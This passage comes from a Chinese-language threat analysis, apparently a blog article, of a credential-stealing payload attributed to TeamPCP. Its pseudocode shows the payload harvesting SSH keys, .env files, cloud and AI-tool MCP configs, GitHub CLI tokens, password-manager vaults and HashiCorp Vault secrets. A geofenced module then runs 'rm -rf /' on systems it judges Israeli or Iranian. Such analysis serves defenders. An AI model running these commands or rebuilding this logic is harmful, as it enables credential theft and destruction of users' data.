14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">~/.cargo/credentials</span></code></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">IaC</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">~/.terraform.d/credentials.tfrc.json</span></code><p><span leaf="">, </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">*.tfstate</span></code><span leaf="">（递归搜索）</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">VPN</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">Tailscale state, WireGuard conf, </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">wg showconf all</span></code></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">Docker</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">~/.docker/config.json</span></code><p><span leaf=""> + 所有容器环境变量（通过 Docker socket 或 CLI）</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">AI 工具</span></strong><p><span leaf=""> ★</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">~/.config/claude/claude_desktop_config.json</span></code><p><span leaf="">, </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">~/.cursor/mcp.json</span></code><span leaf="">, </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">~/.vscode/mcp.json</span></code><span leaf="">, </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">~/.codeium/mcp.json</span></code><span leaf="">, </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">~/.continue/config.json</span></code><span leaf="">, </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">~/.zed/settings.json</span></code></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">Shell 历史</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">~/.bash_history</span></code><p><span leaf="">, </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">~/.zsh_history</span></code></p></td></tr></tbody></table></p><p data-line="208" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">此外还递归搜索 HOME 下的所有 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">.env</span></code><span leaf=""> / </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">.env.*</span></code><span leaf=""> 文件、所有 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">*.tfstate</span></code><span leaf=""> 文件，dump 完整的 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">os.environ</span></code><span leaf="">，以及通过 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">gh auth token</span></code><span leaf=""> 和 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">gh auth status --show-token</span></code><span leaf=""> 主动获取 GitHub CLI 的认证令牌。</span></p><div style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><p style="text-align: right;padding: 4px 10px 2px;background: rgb(212, 218, 226);border-bottom: 1px solid rgb(200, 208, 219);"><span style="font-size: 11px;line-height: 1.4;color: rgb(58, 80, 112);font-family: &#34;Fira Code&#34;, Menlo, &#34;Operator Mono&#34;, Consolas, Monaco, monospace;letter-spacing: 0px;"><span leaf="">python</span></span></p><pre style="margin: 0px;border-width: medium;border-style: none;border-color: currentcolor;border-image: initial;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="python" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border-width: medium;border-style: none;border-color: currentcolor;border-image: initial;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(115, 129, 145);"><span leaf=""># 伪代码 — filesystem.py 核心逻辑</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">steal(read_all(</span><span style="color: rgb(76, 129, 201);"><span leaf="">90</span></span><span leaf="">个硬编码敏感路径))</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">steal(list_and_read(</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;~/.ssh/*&#34;</span></span><span leaf="">))</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">steal(os.environ)                                    </span><span style="color: rgb(115, 129, 145);"><span leaf=""># 全量环境变量</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">steal(recursive_find(</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;~&#34;</span></span><span leaf="">, </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;.env*&#34;</span></span><span leaf="">))                  </span><span style="color: rgb(115, 129, 145);"><span leaf=""># 递归搜索 .env 文件</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">steal(recursive_find(</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;~&#34;</span></span><span leaf="">, </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;*.tfstate&#34;</span></span><span leaf="">))              </span><span style="color: rgb(115, 129, 145);"><span leaf=""># Terraform 状态文件</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">steal(subprocess(</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;gh auth token&#34;</span></span><span leaf="">))                   </span><span style="color: rgb(115, 129, 145);"><span leaf=""># GitHub CLI token</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">steal(docker_socket(</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;/containers/json&#34;</span></span><span leaf="">) → inspect每个容器环境变量)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">steal(subprocess(</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;tailscale status --json&#34;</span></span><span leaf="">))         </span><span style="color: rgb(115, 129, 145);"><span leaf=""># VPN 配置</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">steal(subprocess(</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;wg showconf all&#34;</span></span><span leaf="">))                 </span><span style="color: rgb(115, 129, 145);"><span leaf=""># WireGuard 配置</span></span></p></code></pre></div><p data-line="223" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">该载荷</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">专门针对 AI 开发工具</span></strong><span leaf="">（Claude Desktop、Cursor、VSCode、Codeium、Continue、Zed、OpenCode）的 MCP 配置文件，与 TeamPCP 一贯瞄准 AI/ML 基础设施的策略一致。</span></p><h3 data-line="225" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">5.6 密码管理器：四大管理器联合收割</span></h3><p data-line="227" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">collectors/passwords.py</span></code><span leaf="">（150 行）调用四个密码管理器的 CLI 工具：</span></p><p style="max-width: 100%;overflow-x: auto;"><table style="border-collapse: separate;border-spacing: 0px;border-radius: 6px;margin: 1em auto;color: rgb(51, 51, 51);box-shadow: none;border: 1px solid rgb(208, 215, 227);width: 2812.47px;"><thead><tr><th style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p style="text-align: left;"><span leaf="">     管理器</span></p></th><th style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">手段</span></p></th></tr></thead><tbody><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">1Password</span></strong><p><span leaf=""> (</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">op</span></code><span leaf="">)</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">遍历全部账户 → 全部 Vault → 全部 Item 明文</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">Bitwarden</span></strong><p><span leaf=""> (</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">bw</span></code><span leaf="">)</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">检查解锁状态 → </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">list items</span></code><span leaf=""> 全量导出</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">pass</span></strong></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ls</span></code><p><span leaf=""> → </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">show</span></code><span leaf=""> 遍历所有条目</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">gopass</span></strong></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">list --flat</span></code><p><span leaf=""> → </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">show --password</span></code><span leaf=""> 全量导出</span></p></td></tr></tbody></table></p><div style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><p style="text-align: right;padding: 4px 10px 2px;background: rgb(212, 218, 226);border-bottom: 1px solid rgb(200, 208, 219);"><span style="font-size: 11px;line-height: 1.4;color: rgb(58, 80, 112);font-family: &#34;Fira Code&#34;, Menlo, &#34;Operator Mono&#34;, Consolas, Monaco, monospace;letter-spacing: 0px;"><span leaf="">python</span></span></p><pre style="margin: 0px;border-width: medium;border-style: none;border-color: currentcolor;border-image: initial;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="python" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border-width: medium;border-style: none;border-color: currentcolor;border-image: initial;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(115, 129, 145);"><span leaf=""># 伪代码 — passwords.py 核心逻辑（以 1Password 为例）</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">for</span></span><span leaf=""> account </span><span style="color: rgb(0, 72, 171);"><span leaf="">in</span></span><span leaf=""> op(</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;account list&#34;</span></span><span leaf="">):</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">for</span></span><span leaf=""> vault </span><span style="color: rgb(0, 72, 171);"><span leaf="">in</span></span><span leaf=""> op(</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;vault list&#34;</span></span><span leaf="">, account):</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">for</span></span><span leaf=""> item </span><span style="color: rgb(0, 72, 171);"><span leaf="">in</span></span><span leaf=""> op(</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;item list&#34;</span></span><span leaf="">, vault):</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">            steal(op(</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;item get&#34;</span></span><span leaf="">, item, </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;--format=json&#34;</span></span><span leaf="">))  </span><span style="color: rgb(115, 129, 145);"><span leaf=""># 明文导出每个凭据</span></span></p></code></pre></div><h3 data-line="244" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">5.7 HashiCorp Vault：全 KV 引擎递归遍历</span></h3><p data-line="246" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">collectors/vault.py</span></code><span leaf="">（154 行）支持四种 Token 获取方式（环境变量、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">~/.vault-token</span></code><span leaf="">、AppRole 登录、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">vault print token</span></code><span leaf=""> CLI），然后通过 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">GET /v1/sys/mounts</span></code><span leaf=""> 枚举所有挂载点，对 type=kv/generic 的引擎递归遍历全部密钥路径，读取明文值。</span></p><div style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><p style="text-align: right;padding: 4px 10px 2px;background: rgb(212, 218, 226);border-bottom: 1px solid rgb(200, 208, 219);"><span style="font-size: 11px;line-height: 1.4;color: rgb(58, 80, 112);font-family: &#34;Fira Code&#34;, Menlo, &#34;Operator Mono&#34;, Consolas, Monaco, monospace;letter-spacing: 0px;"><span leaf="">python</span></span></p><pre style="margin: 0px;border-width: medium;border-style: none;border-color: currentcolor;border-image: initial;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="python" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border-width: medium;border-style: none;border-color: currentcolor;border-image: initial;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(115, 129, 145);"><span leaf=""># 伪代码 — vault.py 核心逻辑</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">token = resolve_token()  </span><span style="color: rgb(115, 129, 145);"><span leaf=""># 4种路径: env / ~/.vault-token / AppRole / CLI</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">addr = os.environ.get(</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;VAULT_ADDR&#34;</span></span><span leaf="">) </span><span style="color: rgb(0, 72, 171);"><span leaf="">or</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;<a href="http://127.0.0.1:8200" target="_blank">http://127.0.0.1:8200</a>&#34;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">for</span></span><span leaf=""> mount </span><span style="color: rgb(0, 72, 171);"><span leaf="">in</span></span><span leaf=""> GET(</span><span style="color: rgb(0, 72, 171);"><span leaf="">f&#34;</span><span style="color: rgb(76, 129, 201);"><span leaf="">{addr}</span></span><span leaf="">/v1/sys/mounts&#34;</span></span><span leaf="">):</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span><span leaf=""> mount.</span><span style="color: rgb(0, 72, 171);"><span leaf="">type</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">in</span></span><span leaf=""> (</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;kv&#34;</span></span><span leaf="">, </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;generic&#34;</span></span><span leaf="">):</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">        recursive_walk(mount):  </span><span style="color: rgb(115, 129, 145);"><span leaf=""># 递归遍历全部 KV 路径</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">            steal(read_secret(path))  </span><span style="color: rgb(115, 129, 145);"><span leaf=""># 读取每个密钥的明文值</span></span></p></code></pre></div><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="260" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">六、条件性擦除：俄罗斯轮盘与地缘针对</span></h2><p data-line="262" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">roulette.py</span></code><span leaf=""> 是整个载荷中最具地缘色彩的模块。</span></p><h3 data-line="264" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">6.1 地理围栏检测</span></h3><p data-line="266" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">函数 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">_is_israeli_system()</span></code><span leaf="">（代码作者原始命名）通过五种手段检测目标系统的地理位置：</span></p><p style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><pre style="margin: 0px;border-width: medium;border-style: none;border-color: currentcolor;border-image: initial;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border-width: medium;border-style: none;border-color: currentcolor;border-image: initial;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">TZ 环境变量  ──┐</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">/etc/timezone ─┤── 匹配 </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;Jerusalem&#34;</span></span><span leaf=""> / </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;Tel_Aviv&#34;</span></span><span leaf=""> / </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;Tehran&#34;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">/etc/localtime ┘</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">LANG/LC_ALL  ──┬── 匹配 </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;he_IL&#34;</span></span><span leaf="">(希伯来语) / </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;fa_IR&#34;</span></span><span leaf="">(波斯语)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">locale()     ──┘</span></p></code></pre></p><h3 data-line="276" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">6.2 1/6 概率全盘擦除</span></h3><div style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><p style="text-align: right;padding: 4px 10px 2px;background: rgb(212, 218, 226);border-bottom: 1px solid rgb(200, 208, 219);"><span style="font-size: 11px;line-height: 1.4;color: rgb(58, 80, 112);font-family: &#34;Fira Code&#34;, Menlo, &#34;Operator Mono&#34;, Consolas, Monaco, monospace;letter-spacing: 0px;"><span leaf="">python</span></span></p><pre style="margin: 0px;border-width: medium;border-style: none;border-color: currentcolor;border-image: initial;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="python" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border-width: medium;border-style: none;border-color: currentcolor;border-image: initial;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">roll = random.randint(</span><span style="color: rgb(76, 129, 201);"><span leaf="">1</span></span><span leaf="">, </span><span style="color: rgb(76, 129, 201);"><span leaf="">6</span></span><span leaf="">)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span><span leaf=""> _is_israeli_system() </span><span style="color: rgb(0, 72, 171);"><span leaf="">and</span></span><span leaf=""> roll == </span><span style="color: rgb(76, 129, 201);"><span leaf="">2</span></span><span leaf="">:</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    play_at_full_volume(</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;hxxps[:]//83[.]142.209.194/audio.mp3&#34;</span></span><span leaf="">, </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;RunForCover.mp3&#34;</span></span><span leaf="">)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    subprocess.run([</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;rm&#34;</span></span><span leaf="">, </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;-rf&#34;</span></span><span leaf="">, </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;/&#34;</span></span><span leaf="">])</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">return</span></span></p></code></pre></div><p data-line="286" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">若检测到目标系统位于以色列/伊朗，以 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">1/6 概率</span></strong><span leaf="">触发：先通过 </span><code style="font-size: 